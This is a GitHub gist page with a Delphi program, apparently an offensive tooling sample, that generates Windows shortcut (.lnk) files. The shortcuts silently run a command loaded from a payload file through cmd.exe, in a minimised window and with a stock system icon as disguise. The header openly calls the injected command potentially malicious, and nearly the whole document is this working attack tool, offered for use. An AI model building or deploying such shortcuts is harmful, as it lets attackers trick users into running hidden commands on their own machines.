Skip to content

Instantly share code, notes, and snippets.

@DarkCoderSc
Last active April 3, 2021 13:21

Revisions

  1. DarkCoderSc renamed this gist May 14, 2018. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  2. DarkCoderSc created this gist May 14, 2018.
    72 changes: 72 additions & 0 deletions gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,72 @@
    {-----------------------------------------------------------------------------------------------------------------------}
    { PHROZEN SAS (c) 2018 - www.phrozen.io }
    { Jean-Pierre LESUEUR (jplesueur@phrozen.io) }
    { }
    { Create a Windows Shortcut by code and inject a potential malicious single line command, for post extraction and }
    { execution. }
    {-----------------------------------------------------------------------------------------------------------------------}

    program Shortcut_gen;

    {$APPTYPE CONSOLE}

    uses
    System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;

    function MaliciousLnk(cmd, destPath : String) : Boolean;
    var cObject : IUnknown;
    shellLink : IShellLink;
    PFile : IPersistFile;
    begin
    result := false;
    CoInitialize(nil);
    try
    cObject := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile := cObject as IPersistFile;

    cmd := '/C "' + cmd + '"';
    shellLink.SetDescription('@DarkCoderSc');
    shellLink.SetPath('cmd.exe');
    shellLink.SetArguments(PWideChar(cmd));
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
    shellLink.SetWorkingDirectory('%windir%\system32\');
    shellLink.SetIconLocation('shell32.dll', 1);

    result := PFile.Save(PWideChar(destPath), false) = S_OK;
    finally
    CoUninitialize();
    end;
    end;

    var Arg1, Arg2 : String;
    strList : TStringList;

    begin
    try
    if ParamCount <> 2 then begin
    writeln('usage:');
    writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
    writeln('- Arg2 : Full path of destination shortcut');

    exit;
    end;

    Arg1 := ParamStr(1);
    Arg2 := ParamStr(2);

    if NOT FileExists(Arg1) then exit;

    // THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES
    strList := TStringList.Create;
    strList.LoadFromFile(Arg1);

    MaliciousLnk(strList.Text, Arg2);

    strList.Free;

    finally
    writeln(#13#10 + 'Press enter to leave...');
    readln;
    end;
    end.